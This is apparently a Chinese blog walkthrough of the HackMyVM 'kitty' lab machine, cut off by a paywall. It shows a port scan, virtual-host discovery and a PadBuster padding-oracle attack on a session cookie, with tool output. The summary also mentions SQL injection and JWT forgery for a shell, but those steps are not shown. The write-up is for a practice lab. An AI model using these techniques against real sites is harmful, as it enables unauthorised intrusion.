本文详细介绍了hackmyvm挑战平台上的kitty任务,包括Oracle填充攻击、SQL注入、利用OpenAPI获取shell、通过API执行命令获取用户flag及尝试root提权的过程。在SQL注入部分,利用js接口中的漏洞获取用户密码;通过OpenAPI接口,伪造JWT执行命令,成功获取shell;最终,使用私钥SSH登录获取用户flag,但root提权未成功。
hackmyvm: kitty walkthrough
0x01 oracle padding
端口扫描:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp gitea
使用curl访问80端口, 被重定向到http://kitty.hmv.
该网站为一个静态网站,通过ffuf获取到了虚拟主机名 cookie.kitty.hmv.
注册用户test,查看cookie:
使用 oraclepadding.pl 破解该cookie。
➜ ~ ./oraclepadding.pl http://cookie.kitty.hmv/home/index.php OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG 8 -cookies "auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG"
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
